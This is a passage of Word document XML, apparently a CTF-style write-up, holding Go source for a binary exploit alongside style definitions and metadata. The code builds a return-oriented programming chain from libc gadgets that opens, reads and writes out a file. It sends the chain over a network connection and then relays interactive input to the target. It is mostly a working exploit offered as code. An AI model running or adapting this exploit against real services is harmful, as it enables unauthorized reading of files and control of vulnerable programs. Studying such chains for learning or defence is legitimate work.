    <w:p w14:paraId="1A1359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payload3 = append(payload3, p64(libcBase+openOffset)...)            // open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2585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read(3, bss+0x200, 0x50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3939B2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payload3 = append(payload3, p64(popRdi)...)                         // pop rdi; ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3B8C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payload3 = append(payload3, p64(3)...)                              // rdi = 3 (fd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08258F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payload3 = append(payload3, p64(popRsiR15)...)                      // pop rsi; pop r15; ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCABB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payload3 = append(payload3, p64(bss+0x200)...)                      // rsi = bss+0x200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DEA2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payload3 = append(payload3, p64(0)...)                              // r15 = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1132C8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payload3 = append(payload3, p64(libcBase+popRdxR12Offset)...)       // pop rdx; pop r12; ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E131D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payload3 = append(payload3, p64(0x50)...)                           // rdx = 0x50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C595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payload3 = append(payload3, p64(0)...)                              // r12 = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215E80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payload3 = append(payload3, p64(libcBase+readOffset)...)            // read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2B27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write(1, bss+0x200, 0x50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3DA8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payload3 = append(payload3, p64(popRdi)...)                         // pop rdi; ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D34B3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payload3 = append(payload3, p64(1)...)                              // rdi = 1 (stdout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F486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payload3 = append(payload3, p64(popRsiR15)...)                      // pop rsi; pop r15; ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267E59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payload3 = append(payload3, p64(bss+0x200)...)                      // rsi = bss+0x200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233E68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payload3 = append(payload3, p64(0)...)                              // r15 = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B3FB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payload3 = append(payload3, p64(libcBase+popRdxR12Offset)...)       // pop rdx; pop r12; ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C12A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payload3 = append(payload3, p64(0x50)...)                           // rdx = 0x50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0B85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payload3 = append(payload3, p64(0)...)                              // r12 = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2754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payload3 = append(payload3, p64(libcBase+writeOffset)...)           // write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA8BC32">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="251CBC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fmt.Printf("Payload3 length: 0x%x\n", len(payload3))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661E8CD1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01D3DF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Send second payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA314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_, err := conn.Write(payload3); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D258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fmt.Printf("Failed to send payload3: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705E4B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155EDD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3082069B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075B0A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Enter interactive mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0829F0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go func() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FED7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Read and print server responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137627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data := make([]byte, 4096)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135048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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBB75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n, err := reader.Read(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F242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err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34054C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fmt.Printf("Error reading response: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D5B4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D94D3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289255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fmt.Print(string(data[:n]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2A68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3A69E0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}()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7E3B55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="253D8B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Read user input and send to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CF01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scanner := bufio.NewScanner(os.Stdin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B119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 scanner.Scan() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E20B8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input := scanner.Text() + "\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCA15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_, err := conn.Write([]byte(input)); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3019C5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fmt.Printf("Failed to send input: %v\n", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A4A8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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0C57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43F7C4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2B2710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3C09194">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EA6D1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p64 converts a uint64 to 8-byte little-endian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CA12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 p64(val uint64) []byte {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AA98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buf := make([]byte, 8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D829B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binary.LittleEndian.PutUint64(buf, val)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AF99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buf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F5D4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D784DBC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02252F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readUntil reads from reader until the delimiter is found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDE2B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 readUntil(reader *bufio.Reader, delim string) (string, error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7076A1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var result strings.Builder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5AAC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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAD37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line, err := reader.ReadString('\n')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E314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err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FCDB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"", err</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03635D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0D2206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result.WriteString(line)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BD22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strings.Contains(result.String(), delim) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40902C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result.String(), nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042D5E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5809BA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7EE43D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FB2A03E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6494BA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readNBytes reads exactly n bytes from reader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716831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 readNBytes(reader *bufio.Reader, n int) ([]byte, error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230ECF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result := make([]byte, n)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286F5A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_, err := io.ReadFull(reader, result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D679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err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557253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nil, err</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCA88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741B2E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result, nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7629F2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250D23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877"/>
    <w:rsid w:val="001043FF"/>
    <w:rsid w:val="001F595E"/>
    <w:rsid w:val="003D0756"/>
    <w:rsid w:val="003F6770"/>
    <w:rsid w:val="005457D8"/>
    <w:rsid w:val="00555ADA"/>
    <w:rsid w:val="005849AA"/>
    <w:rsid w:val="005B605D"/>
    <w:rsid w:val="0061096D"/>
    <w:rsid w:val="006D7CD7"/>
    <w:rsid w:val="0084766E"/>
    <w:rsid w:val="008B58F1"/>
    <w:rsid w:val="00A14648"/>
    <w:rsid w:val="00AF064E"/>
    <w:rsid w:val="00BB5292"/>
    <w:rsid w:val="00C346CE"/>
    <w:rsid w:val="00CD7DCC"/>
    <w:rsid w:val="00E50877"/>
    <w:rsid w:val="00EA3779"/>
    <w:rsid w:val="7EFF5365"/>
    <w:rsid w:val="BDF1E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2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4"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6"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99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7">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="15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10">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="9"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="11">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="9"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="9"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="30"/>
      <w:szCs w:val="32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标题 4 字符"/>
    <w:basedOn w:val="9"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="15">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="9"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="9"/>
    <w:link w:val="6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6249E991-657F-4D14-80E0-94E3ED3458F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22</Words>
  <Characters>129</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>150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2025-04-23T06:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-17T11:19:36Z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B050CBC788D8E86D58FD276813969C61_42</vt:lpwstr>
  </property>
</Properties>
</file>